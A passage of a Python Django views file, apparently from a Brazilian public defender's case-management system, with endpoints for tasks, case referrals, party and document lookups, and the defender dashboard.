u'Erro ao excluir: O documento não existe!'\r\n else:\r\n mensagem = u'Documento excluído!'\r\n success = True\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': success, 'mensagem': mensagem})\r\n else:\r\n if success:\r\n messages.success(request, mensagem)\r\n else:\r\n messages.error(request, mensagem)\r\n return redirect(request.META.get('HTTP_REFERER', '/'))\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_tarefa')\r\ndef excluir_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n\r\n try:\r\n tarefa = Tarefa.objects.get(id=dados['id'], ativo=True, finalizado=None)\r\n tarefa.excluir(excluido_por=request.user.servidor)\r\n except Exception:\r\n success = False\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.change_tarefa')\r\ndef finalizar_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n success = True\r\n dados = simplejson.loads(request.body)\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=dados['id'], ativo=True, finalizado=None)\r\n tarefa.finalizar(request.user.servidor)\r\n\r\n if tarefa.tarefa_oficio:\r\n atendimento = tarefa.atendimento\r\n AtendimentoDefensor.objects.create(\r\n origem=atendimento,\r\n inicial=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n data_atendimento=datetime.now(),\r\n tipo=AtendimentoDefensor.TIPO_OFICIO_FINALIZADO,\r\n oficio=atendimento.oficio,\r\n detalhes=atendimento.detalhes\r\n )\r\n\r\n except ObjectDoesNotExist:\r\n\r\n success = False\r\n\r\n return JsonResponse({'success': success, 'atendimento': atendimento_numero, 'id': dados['id']})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\ndef remeter_atendimento(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n try:\r\n agora = timezone.now()\r\n servidor = request.user.servidor\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n setor_responsavel = Defensoria.objects.get(id=dados['defensoria_destino_id'])\r\n\r\n # Cria anotação\r\n AtendimentoDefensor.objects.create(\r\n tipo=AtendimentoDefensor.TIPO_ANOTACAO,\r\n data_agendamento=agora,\r\n data_atendimento=agora,\r\n cadastrado_por=servidor,\r\n agendado_por=servidor,\r\n atendido_por=servidor,\r\n inicial_id=dados['atendimento_id'],\r\n origem_id=dados['atendimento_id'],\r\n defensor_id=dados['defensor_destino_id'],\r\n defensoria_id=dados['defensoria_destino_id'],\r\n qualificacao_id=dados['qualificacao_id'],\r\n historico=dados['historico'],\r\n )\r\n\r\n # cria cooperação com o remetimento\r\n Tarefa.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n resposta_para=setor_responsavel,\r\n setor_responsavel=atendimento.defensoria,\r\n titulo='REMETIMENTO DE ATENDIMENTO',\r\n descricao=\"Cooperação gerada automaticamente após atendimento ser remetido de \" + atendimento.defensoria.nome + \" para \" + setor_responsavel.nome, # noqa: E501\r\n data_inicial=date.today(),\r\n data_final=None,\r\n prioridade=Tarefa.PRIORIDADE_COOPERACAO,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n except Exception:\r\n success = False\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\nclass BuscarTarefas(ListView):\r\n queryset = Tarefa.objects.select_related(\r\n 'atendimento__defensor__defensoria',\r\n 'setor_responsavel',\r\n 'responsavel__usuario',\r\n 'cadastrado_por__usuario',\r\n ).annotate(\r\n respondido_por=F('all_respostas__finalizado__nome'),\r\n respondido_por_username=F('all_respostas__finalizado__usuario__username'),\r\n ).filter(\r\n (\r\n Q(origem=None) &\r\n Q(atendimento__ativo=True) &\r\n ~Q(\r\n Q(titulo='Solicitação de Apoio Respondida') &\r\n Q(responsavel=None) &\r\n Q(data_inicial=None) &\r\n Q(data_final=None)\r\n )\r\n ) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n ) &\r\n (\r\n Q(all_respostas=None) |\r\n (\r\n ~Q(all_respostas__finalizado=None) &\r\n Q(all_respostas__ativo=True)\r\n )\r\n )\r\n ).order_by(\r\n 'data_inicial', 'prioridade', 'data_final', 'id', '-all_respostas__id'\r\n ).distinct(\r\n 'data_inicial', 'prioridade', 'data_final', 'id'\r\n )\r\n model = Tarefa\r\n paginate_by = 50\r\n template_name = \"atendimento/tarefa/buscar.html\"\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(BuscarTarefas, self).get_context_data(**kwargs)\r\n\r\n context.update({\r\n 'form': self.get_form(),\r\n 'ordering': swap_ordenacao_tarefas(self.request.GET.get('ordering', 'data_final'))\r\n })\r\n\r\n return context\r\n\r\n def get_queryset(self):\r\n\r\n queryset = super(BuscarTarefas, self).get_queryset()\r\n q = Q()\r\n\r\n # Obtém lista de defensorias do usuário\r\n defensorias = set(self.request.user.servidor.defensor.defensorias.values_list('id', flat=True))\r\n\r\n # Configuração para exibir ou não as cooperações cumpridas\r\n if not config.EXIBIR_COOPERACOES_CUMPRIDAS_PARA_RESPONSAVEL:\r\n q &= ~Q(\r\n Q(prioridade=Tarefa.PRIORIDADE_COOPERACAO) &\r\n Q(status=Tarefa.STATUS_CUMPRIDO) &\r\n Q(setor_responsavel__in=defensorias)\r\n )\r\n\r\n # Se usuário não tem permissão para ver todos atendimentos, restringe informações de acordo com suas lotações\r\n if not self.request.user.has_perm(perm='atendimento.view_all_atendimentos'):\r\n q &= Q(setor_responsavel__in=defensorias)\r\n\r\n tarefas_propac = get_tarefas_propac()\r\n\r\n form = self.get_form()\r\n\r\n # Só filtra se valores de busca forem válidos\r\n if form.is_valid():\r\n\r\n data = form.cleaned_data\r\n\r\n filtros_tarefas = filtra_tarefas(data)\r\n q &= filtros_tarefas\r\n\r\n tarefas_propac = tarefas_propac.filter(filtros_tarefas)\r\n\r\n queryset = queryset.filter(q)\r\n\r\n if tarefas_propac:\r\n queryset = queryset | tarefas_propac\r\n queryset = queryset.order_by('data_inicial', 'prioridade', 'data_final', 'id')\r\n\r\n return queryset\r\n\r\n def get_ordering(self):\r\n return self.request.GET.get('ordering', 'data_final')\r\n\r\n def get_form(self):\r\n\r\n form_initial = self.request.GET.copy()\r\n\r\n if config.PRE_FILTRAR_TAREFAS_USUARIO_LOGADO and 'responsavel' not in form_initial and self.request.user.servidor.defensor: # noqa: E501\r\n form_initial['responsavel'] = self.request.user.servidor.defensor.id\r\n\r\n return BuscarTarefaForm(form_initial, usuario=self.request.user)\r\n\r\n\r\nclass FinalizarTarefas(View):\r\n def post(self, request, *args, **kwargs):\r\n\r\n # obtém lista de tarefas marcadas\r\n tarefas = Tarefa.objects.filter(\r\n id__in=request.POST.getlist('id')\r\n )\r\n\r\n agora = timezone.now()\r\n tarefas_finalizadas = 0\r\n tarefas_nao_finalizadas = 0\r\n\r\n # passa em cada registro, verificando permissão para finaliza\r\n for tarefa in tarefas:\r\n if tarefa.pode_finalizar(request.user):\r\n tarefa.finalizar(\r\n servidor=request.user.servidor,\r\n data_finalizado=agora\r\n )\r\n tarefas_finalizadas += 1\r\n else:\r\n tarefas_nao_finalizadas += 1\r\n\r\n if tarefas_finalizadas:\r\n messages.success(request, '{} tarefas foram finalizadas!'.format(\r\n tarefas_finalizadas\r\n ))\r\n\r\n if tarefas_nao_finalizadas:\r\n messages.error(request, '{} tarefas não puderam ser finalizadas!'.format(\r\n tarefas_nao_finalizadas\r\n ))\r\n\r\n return HttpResponseRedirect(self.request.META.get('HTTP_REFERER', '/'))\r\n\r\n\r\n@login_required\r\ndef visualizar_tarefa(request, tarefa_id):\r\n\r\n success = True\r\n message = None\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=tarefa_id, ativo=True)\r\n\r\n if request.user.is_superuser and not config.REGISTRAR_VISUALIZACAO_TAREFA_SUPERUSUARIO:\r\n message = 'Visualização não registrada (superusuário)'\r\n elif tarefa.cadastrado_por and tarefa.cadastrado_por.usuario_id == request.user.id:\r\n message = 'Visualização não registrada (cadastrante)'\r\n else:\r\n TarefaVisualizacao.objects.get_or_create(\r\n tarefa=tarefa,\r\n visualizada_por=request.user.servidor\r\n )\r\n message = 'Visualização registrada'\r\n\r\n except ObjectDoesNotExist:\r\n message = 'Tarefa não existe'\r\n success = False\r\n\r\n return JsonResponse({\r\n 'id': tarefa_id,\r\n 'success': success,\r\n 'message': message\r\n })\r\n\r\n\r\n@login_required\r\ndef get_tarefa(request, tarefa_id):\r\n\r\n resposta = {}\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=tarefa_id, ativo=True)\r\n resposta = Util.object_to_dict(tarefa, {})\r\n\r\n resposta['visualizacoes'] = []\r\n visualizacoes = tarefa.visualizacoes.all().values('visualizada_em', 'visualizada_por__nome')\r\n\r\n for v in visualizacoes:\r\n resposta['visualizacoes'].append({\r\n 'visualizada_em': v['visualizada_em'].strftime('%Y-%m-%dT%H:%M:%S-03:00'),\r\n 'visualizada_por': v['visualizada_por__nome']\r\n })\r\n\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json(request, atendimento_numero):\r\n\r\n a = get_object_or_404(\r\n AtendimentoDefensor.objects.select_related(\r\n 'qualificacao__area',\r\n 'qualificacao__especializado',\r\n 'comarca',\r\n 'defensoria',\r\n 'defensor__servidor',\r\n 'substituto__servidor',\r\n 'nucleo',\r\n 'modificado_por',\r\n 'agendado_por',\r\n 'atendido_por',\r\n 'tipo_motivo_exclusao'\r\n ),\r\n numero=atendimento_numero\r\n )\r\n\r\n requerente = None\r\n requentes = []\r\n\r\n requerido_nome = None\r\n requeridos = []\r\n\r\n for pessoa in a.pessoas.values('pessoa_id', 'pessoa__nome', 'responsavel', 'tipo'):\r\n\r\n assistido = {\r\n 'id': pessoa['pessoa_id'],\r\n 'nome': pessoa['pessoa__nome']\r\n }\r\n\r\n if pessoa['tipo'] == AtendimentoPessoa.TIPO_REQUERENTE:\r\n if pessoa['responsavel']:\r\n requerente = assistido\r\n requentes.append(assistido)\r\n else:\r\n if pessoa['responsavel']:\r\n requerido_nome = assistido['nome']\r\n requeridos.append(assistido)\r\n\r\n resposta = {\r\n 'id': a.id,\r\n 'numero': a.numero,\r\n 'tipo': a.LISTA_TIPO[a.tipo][1],\r\n 'tipo_id': a.tipo,\r\n 'requerente': requerente['nome'] if requerente else None,\r\n 'requerentes': requentes,\r\n 'requerido': requerido_nome,\r\n 'requeridos': requeridos,\r\n 'area': a.qualificacao.area.nome if a.qualificacao else None,\r\n 'pedido': a.qualificacao.titulo if a.qualificacao else None,\r\n 'nucleo': a.nucleo.nome if a.nucleo else None,\r\n 'especializado': a.qualificacao.especializado.nome if a.qualificacao and a.qualificacao.especializado else None,\r\n 'horario': a.data_agendamento.time().strftime('%H:%M') if a.data_agendamento else None,\r\n 'horario_atendimento': a.data_atendimento.time().strftime('%H:%M') if a.data_atendimento else None,\r\n 'atrasado': a.atrasado,\r\n 'historico_recepcao': 1 if a.recepcao else 0,\r\n 'historico_atendimento': 1 if a.historico else 0,\r\n 'comarca': a.comarca.nome if a.comarca else None,\r\n 'defensoria': a.defensoria.nome if a.defensoria else None,\r\n 'defensor': a.defensor.nome if a.defensor else None,\r\n 'substituto': a.substituto.nome if a.substituto else None,\r\n 'id_comarca': a.comarca.id if a.comarca else None,\r\n 'guiche': 0,\r\n 'agendado_por': a.agendado_por.nome if a.agendado_por else None,\r\n 'data_agendado': a.data_cadastro.strftime('%Y-%m-%dT%H:%M:00-03:00'),\r\n 'cadastrado_por': a.recepcao.atendido_por.nome if a.recepcao else None,\r\n 'data_cadastro': a.recepcao.data_atendimento.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.recepcao else None,\r\n 'modificado_por': a.modificado_por.nome if a.modificado_por else None,\r\n 'data_modificacao': a.data_modificacao.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.data_modificacao else None,\r\n 'atendido_por': a.atendido_por.nome if a.atendido_por else None,\r\n 'data_atendimento': a.data_atendimento.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.data_atendimento else None,\r\n 'agenda': a.agenda.nome,\r\n 'extra': a.extra,\r\n 'remarcado': a.qtd_remarcado,\r\n 'telefones': Util.json_serialize(Telefone.objects.filter(pessoa=requerente['id']) if requerente else []),\r\n 'pode_excluir': a.pode_excluir(usuario=request.user),\r\n 'motivo_exclusao': a.motivo_exclusao,\r\n 'motivo_exclusao_nome': a.tipo_motivo_exclusao.nome if a.tipo_motivo_exclusao else None,\r\n 'motivos_exclusao': list(MotivoExclusao.objects.ativos().values('id', 'nome'))\r\n }\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_permissao_atendimento_botoes(request, atendimento_numero):\r\n \"\"\"Utilizado para o tratamento de renderização dos botões das ações da Ficha de Atendimento.\r\n Botão de anotação, apoio operacional e agendar.\r\n \"\"\"\r\n\r\n sucesso = True\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n\r\n pode_agendar = False\r\n pode_solicitar_apoio = False\r\n pode_cadastrar_anotacao = False\r\n pode_cadastrar_visita_ao_preso = False\r\n\r\n retorno_pendente = False\r\n\r\n if atendimento:\r\n\r\n if (verifica_permissao_editar(request.user, atendimento) or\r\n atendimento.permissao_acessar(usuario=request.user) or\r\n atendimento.acesso_concedido(defensor=request.user.servidor.defensor)):\r\n\r\n if atendimento.realizado:\r\n\r\n # não tem retorno pendente\r\n if not atendimento.retornos_pendentes:\r\n pode_agendar = True\r\n else:\r\n retorno_pendente = True\r\n\r\n if not atendimento.tipo == atendimento.TIPO_NUCLEO:\r\n pode_solicitar_apoio = True\r\n\r\n if atendimento.realizado or config.REGISTRAR_ANOTACAO_EM_AGENDAMENTO:\r\n pode_cadastrar_anotacao = True\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(\r\n pessoa=atendimento.requerente.pessoa,\r\n ativo=True\r\n ).exists()\r\n\r\n if prisoes:\r\n pode_cadastrar_visita_ao_preso = True\r\n\r\n else:\r\n sucesso = False\r\n\r\n permissao_botoes_acoes = {\r\n 'retorno_pendente': retorno_pendente,\r\n 'pode_agendar': pode_agendar,\r\n 'pode_solicitar_apoio': pode_solicitar_apoio,\r\n 'pode_cadastrar_anotacao': pode_cadastrar_anotacao,\r\n 'pode_cadastrar_visita_ao_preso': pode_cadastrar_visita_ao_preso\r\n }\r\n\r\n return JsonResponse({\r\n 'sucesso': sucesso,\r\n 'permissao_botoes': permissao_botoes_acoes\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_pessoas(request, atendimento_numero, tipo):\r\n \"\"\"Utilizado para buscar Requerentes e Requeridos via json\"\"\"\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n if atendimento:\r\n\r\n pessoas_dict = []\r\n interessado = None\r\n eh_requerente = True\r\n\r\n if int(tipo) == AtendimentoPessoa.TIPO_REQUERENTE:\r\n pessoas = atendimento.get_requerentes()\r\n tipo = 'requerentes'\r\n\r\n if hasattr(atendimento, 'atendimento'):\r\n interessado = atendimento.atendimento.interessado_id\r\n\r\n else:\r\n pessoas = atendimento.get_requeridos()\r\n tipo = 'requeridos'\r\n eh_requerente = False\r\n\r\n for pessoa in pessoas:\r\n filiacao = []\r\n\r\n for f in pessoa.pessoa.filiacoes.all():\r\n filiacao.append({'nome': f.nome})\r\n\r\n # busca a foto da pessoa\r\n from assistido.models import PessoaAssistida\r\n foto = PessoaAssistida.objects.filter(id=pessoa.pessoa.id).first().get_foto()\r\n\r\n # verifica se a pessoa esta presa\r\n from nucleo.nadep.models import Aprisionamento\r\n preso = Aprisionamento.objects.filter(prisao__pessoa=pessoa.pessoa, data_final=None, ativo=True).exists(),\r\n\r\n pessoas_dict.append({\r\n 'pessoa_id': pessoa.pessoa.id,\r\n 'nome': pessoa.pessoa.nome,\r\n 'nome_tratado': pessoa.pessoa.nome_tratado,\r\n 'possui_nome_social': pessoa.pessoa.possui_nome_social(),\r\n 'possui_nome_fantasia': pessoa.pessoa.possui_nome_fantasia(),\r\n 'eh_pessoa_fisica': pessoa.pessoa.eh_pessoa_fisica,\r\n 'cpf': pessoa.pessoa.cpf,\r\n 'data_nascimento': pessoa.pessoa.data_nascimento,\r\n 'idade': pessoa.pessoa.idade,\r\n 'idoso': pessoa.pessoa.idoso,\r\n 'pne': pessoa.pessoa.pne,\r\n 'responsavel': pessoa.responsavel,\r\n 'interessado': pessoa.pessoa.id == interessado,\r\n 'preso': preso[0],\r\n 'eh_requerente': eh_requerente,\r\n 'eh_requerido': not eh_requerente,\r\n 'filiacao': filiacao,\r\n 'foto': foto\r\n })\r\n\r\n return JsonResponse({tipo: pessoas_dict})\r\n\r\n return JsonResponse({'mensagem': 'Atendimento não encontrado.'})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_documentos(request, atendimento_numero):\r\n \"\"\"Busca os documentos do atendimento\"\"\"\r\n\r\n documentos = AtendimentoDefensor.objects.filter(\r\n numero=atendimento_numero\r\n ).first().documentos.select_related(\r\n 'documento_online',\r\n 'cadastrado_por__usuario',\r\n 'enviado_por__usuario',\r\n )\r\n\r\n documentos_list = []\r\n\r\n for documento in documentos:\r\n documentos_list.append({\r\n 'id': documento.id,\r\n 'nome': documento.nome,\r\n 'arquivo': documento.arquivo.url if documento.arquivo else '',\r\n 'data_cadastro': documento.data_cadastro,\r\n 'cadastrado_por_nome': documento.cadastrado_por.nome if documento.cadastrado_por else None,\r\n 'cadastrado_por_username': documento.cadastrado_por.usuario.username if documento.cadastrado_por else None,\r\n 'data_enviado': documento.data_enviado,\r\n 'enviado_por_nome': documento.enviado_por.nome if documento.enviado_por else None,\r\n 'enviado_por_username': documento.enviado_por.usuario.username if documento.enviado_por else None,\r\n 'documento_online': {\r\n 'id': documento.documento_online_id,\r\n 'assunto': documento.documento_online.assunto,\r\n 'identificador_versao': documento.documento_online.identificador_versao\r\n } if documento.documento_online else None,\r\n 'pendente': documento.pendente,\r\n })\r\n\r\n return JsonResponse({'documentos': documentos_list})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_arvore_json(request, atendimento_numero):\r\n inicial = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n if inicial:\r\n\r\n resposta = {'success': True, 'remarcar': None, 'retornos': [], 'processos': []}\r\n\r\n retornos = inicial.retornos.values(\r\n 'id',\r\n 'numero',\r\n 'data_cadastro',\r\n 'data_agendamento',\r\n 'data_atendimento',\r\n 'defensor__servidor__nome',\r\n 'defensoria__nome',\r\n 'nucleo__nome',\r\n 'qualificacao__titulo',\r\n 'qualificacao__area__nome',\r\n 'tipo',\r\n 'cadastrado_por__nome',\r\n 'historico_recepcao',\r\n 'historico',\r\n ).exclude(\r\n tipo=Atendimento.TIPO_NUCLEO\r\n ).order_by(\r\n 'data_atendimento', 'data_agendamento'\r\n )\r\n\r\n for retorno in retornos:\r\n\r\n if not retorno['data_atendimento']:\r\n resposta['remarcar'] = retorno['numero']\r\n\r\n resposta['retornos'].append({\r\n 'numero': retorno['numero'],\r\n 'data_cadastro': retorno['data_cadastro'],\r\n 'data_agendamento': retorno['data_agendamento'],\r\n 'data_atendimento': retorno['data_atendimento'],\r\n 'defensor': retorno['defensor__servidor__nome'],\r\n 'defensoria': retorno['defensoria__nome'],\r\n 'nucleo': retorno['nucleo__nome'],\r\n 'qualificacao': retorno['qualificacao__titulo'],\r\n 'area': retorno['qualificacao__area__nome'],\r\n 'tipo': dict(Atendimento.LISTA_TIPO)[retorno['tipo']],\r\n 'cadastrado_por': retorno['cadastrado_por__nome'],\r\n 'historico_agendamento': retorno['historico_recepcao'],\r\n 'historico_defensor': retorno['historico'],\r\n 'recepcao': None,\r\n 'arquivado': inicial.arquivado,\r\n })\r\n\r\n resposta['retornos'][-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=retorno['id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n processos = inicial.get_processos().values(\r\n 'numero_puro',\r\n 'numero',\r\n 'chave',\r\n 'grau',\r\n 'tipo',\r\n )\r\n\r\n resposta['processos'] = list(processos)\r\n\r\n return JsonResponse(resposta)\r\n\r\n else:\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index(request):\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n raise Http404\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca.id\r\n\r\n nucleo = request.session.get('nucleo')\r\n pode_cadastrar_atividade_extraordinaria = False\r\n\r\n try:\r\n inicio = datetime.strptime(request.POST['data_atendimento'], '%d/%m/%Y')\r\n except KeyError:\r\n inicio = datetime.now()\r\n\r\n atuacoes = Atuacao.objects.filter(defensor=defensor)\r\n\r\n # Se hoje, obtém atuações vigentes\r\n if inicio.date() == date.today():\r\n atuacoes = atuacoes.vigentes(inicio=inicio, ajustar_horario=False)\r\n # Se outro dia, obtém atuações parcialmente vigentes no dia\r\n else:\r\n atuacoes = atuacoes.parcialmente_vigentes(inicio=inicio)\r\n\r\n # Se núcleo, filtra atuações do núcleo, senão, filtra atuações sem núcleo vinculado\r\n if nucleo:\r\n atuacoes = atuacoes.filter(defensoria__nucleo=nucleo)\r\n else:\r\n atuacoes = atuacoes.filter(defensoria__nucleo__isnull=True)\r\n\r\n pode_cadastrar_atividade_extraordinaria = atuacoes.filter(\r\n defensoria__pode_cadastrar_atividade_extraordinaria=True\r\n ).exists()\r\n\r\n ids_defensoria_atuacoes = list(set(atuacoes.values_list('defensoria_id', flat=True)))\r\n processos_cadastrados = ParteProcesso.objects.filter(\r\n (\r\n (\r\n Q(defensoria__in=ids_defensoria_atuacoes) & Q(defensoria__nucleo=nucleo)\r\n ) |\r\n (\r\n Q(defensoria_cadastro__in=ids_defensoria_atuacoes) & Q(defensoria_cadastro__nucleo=nucleo)\r\n )\r\n ) &\r\n Q(ativo=True) &\r\n ~Q(atendimento=None) &\r\n Q(data_cadastro__gte=(datetime.now().date() - timedelta(days=30)))\r\n ).order_by('-data_cadastro')\r\n\r\n processos_movimentados = ParteProcesso.objects.filter(\r\n (\r\n (\r\n Q(defensoria__in=ids_defensoria_atuacoes) & Q(defensoria__nucleo=nucleo)\r\n ) |\r\n (\r\n Q(defensoria_cadastro__in=ids_defensoria_atuacoes) & Q(defensoria_cadastro__nucleo=nucleo)\r\n )\r\n ) &\r\n Q(ativo=True) &\r\n ~Q(atendimento=None) &\r\n Q(processo__ultima_consulta__gte=(datetime.now().date() - timedelta(days=30)))\r\n ).order_by('-processo__ultima_consulta')\r\n\r\n sistemas_webservices_procapi = []\r\n\r\n if config.ATIVAR_PROCAPI:\r\n from procapi_client.services import APISistema\r\n sistemas_webservices_procapi = APISistema().listar_todos()\r\n\r\n return render(\r\n request=request,\r\n template_name=\"atendimento/index.html\",\r\n context={\r\n 'usuario': request.user,\r\n 'defensor_id': defensor.id,\r\n 'defensor': defensor,\r\n 'comarca': comarca,\r\n 'nucleo': nucleo,\r\n 'inicio': inicio,\r\n 'ids_defensoria_atuacoes': ids_defensoria_atuacoes,\r\n 'processos_cadastrados': processos_cadastrados,\r\n 'processos_movimentados': processos_movimentados,\r\n 'angular': 'AtendimentoIndexCtrl',\r\n 'pode_cadastrar_atividade_extraordinaria': pode_cadastrar_atividade_extraordinaria,\r\n 'next_excluir': reverse('atendimento_index'),\r\n 'sigla_uf': settings.SIGLA_UF.upper(),\r\n 'ativar_acompanhamento_processo': config.ATIVAR_ACOMPANHAMENTO_PROCESSO,\r\n 'dias_acompanhamento_processo': config.DIAS_ACOMPANHAMENTO_PROCESSO,\r\n 'sistemas_webservices_procapi': sistemas_webservices_procapi\r\n }\r\n )\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get(request):\r\n \"\"\"Utilizado para buscar os atendimentos conforme o dia selecionado no Painel do Defensor\"\"\"\r\n\r\n mensagem = 'Erro ao buscar dados'\r\n sucesso = False\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n # faz leitura de dados do request Ajax e trata a data base\r\n dados = simplejson.loads(request.body)\r\n try:\r\n data_base = datetime.strptime(dados['data'][:10], '%Y-%m-%d').date()\r\n except KeyError:\r\n data_base = date.today()\r\n\r\n defensor = request.user.servidor.defensor\r\n\r\n # busca as atuações do dia selecionado\r\n defensorias = list(defensor.all_atuacoes.parcialmente_vigentes(\r\n inicio=data_base,\r\n termino=data_base\r\n ).values_list('defensoria_id', flat=True))\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca\r\n\r\n nucleo = request.session.get('nucleo')\r\n itinerante = request.user.servidor.proximo_itinerante\r\n\r\n if not defensor.eh_defensor and itinerante and nucleo and nucleo.itinerante:\r\n defensorias = [itinerante.defensoria_id]\r\n\r\n # Se não existir atuação para o dia selecionado não deve nem executar a query\r\n if defensorias:\r\n\r\n # início da criação da query para buscar dados da vw_atendimentos_defensor\r\n data_base_ini = data_base\r\n data_base_fim = datetime.combine(data_base, time.max)\r\n\r\n from atendimento.atendimento.models import ViewAtendimentoDefensor\r\n\r\n query = Q(\r\n Q(defensoria_id__in=defensorias) &\r\n Q(\r\n Q(data_atendimento__range=[data_base_ini, data_base_fim]) |\r\n Q(\r\n Q(data_atendimento=None) &\r\n Q(\r\n Q(data_agendamento__range=[data_base_ini, data_base_fim]) |\r\n Q(tipo=Atendimento.TIPO_NUCLEO)\r\n )\r\n )\r\n )\r\n )\r\n\r\n if nucleo:\r\n query &= Q(nucleo_id=nucleo.id)\r\n\r\n if nucleo.supervisionado and not defensor.eh_defensor:\r\n query &= Q(responsavel_id=defensor.id)\r\n\r\n else:\r\n query &= Q(comarca_id=comarca.id) & Q(nucleo_id=None)\r\n\r\n atendimentos = ViewAtendimentoDefensor.objects.filter(\r\n query\r\n ).order_by(\r\n '-data_atendimento',\r\n '-prioridade',\r\n 'data_atendimento_recepcao',\r\n 'data_agendamento'\r\n )\r\n\r\n # TODO: Usar método da model atendimento.Defensor\r\n # Permite atender sem liberar pela recepção se tiver permissão pra isso\r\n pode_atender_sem_liberar = request.user.has_perm('atendimento.atender_sem_liberar')\r\n pode_atender_retroativo = request.user.has_perm('atendimento.atender_retroativo')\r\n\r\n dados = []\r\n for a in atendimentos:\r\n\r\n if not a.data_atendimento and a.recepcao_id:\r\n cron = Cronometro.objects.filter(\r\n atendimento_id=a.id,\r\n termino__gte=a.data_atendimento_recepcao\r\n ).order_by(\r\n '-termino'\r\n ).first()\r\n else:\r\n cron = None\r\n\r\n # Adiciona verificação se o atendimento é LUNA, visto que os atendimentos LUNA sempre recebem um\r\n # Responsável a partir do momento que é distribuído no CRC, quebrando a lógica abaixo.\r\n # Tratar um agendamento LUNA com a lógica de distribuído faz com que os liberados não apareçam\r\n # devido o filtro presente em atendimento/index_box_atendimentos.html\r\n usuario_luna = None\r\n atendimento_online = False\r\n if settings.CHATBOT_LUNA_USERNAME:\r\n usuario_luna = User.objects.get(username=settings.CHATBOT_LUNA_USERNAME)\r\n if usuario_luna:\r\n atendimento_online = True if usuario_luna.first_name == a.cadastrado_por_nome else False\r\n\r\n dados.append({\r\n 'id': a.id,\r\n 'numero': a.numero,\r\n 'tipo': Atendimento.LISTA_TIPO[a.tipo][1],\r\n 'data_agendamento': Util.date_to_json(a.data_agendamento) if a.data_agendamento else None,\r\n 'data_atendimento': Util.date_to_json(a.data_atendimento) if a.data_atendimento else None,\r\n 'data_atendimento_recepcao': Util.date_to_json(a.data_atendimento_recepcao) if a.data_atendimento_recepcao else None, # noqa: E501\r\n 'requerente': a.requerente_nome,\r\n 'requerente_nome_social': a.requerente_nome_social,\r\n 'requerido': a.requerido_nome,\r\n 'requerido_nome_social': a.requerido_nome_social,\r\n 'agenda': a.agenda_id,\r\n 'forma_atendimento': a.forma_atendimento_id,\r\n 'extra': a.extra,\r\n 'inicial': a.inicial_numero,\r\n 'origem': a.origem_tipo,\r\n 'recepcao': a.recepcao_id or pode_atender_sem_liberar or pode_atender_retroativo,\r\n 'defensor': a.defensor_nome,\r\n 'substituto': a.substituto_nome,\r\n 'responsavel': a.responsavel_nome,\r\n 'defensoria': a.defensoria_origem_nome if a.tipo == Atendimento.TIPO_NUCLEO else a.defensoria_nome, # noqa: E501\r\n 'nucleo': a.nucleo_nome,\r\n 'apoio': True if a.tipo == Atendimento.TIPO_NUCLEO else False,\r\n 'liberado': True if a.liberado_por_nome is not None else False,\r\n 'qualificacao': a.qualificacao_nome,\r\n 'area': a.area_nome,\r\n 'agendado': True if a.data_agendamento else False,\r\n 'realizado': True if a.data_atendimento else False,\r\n 'distribuido': True if 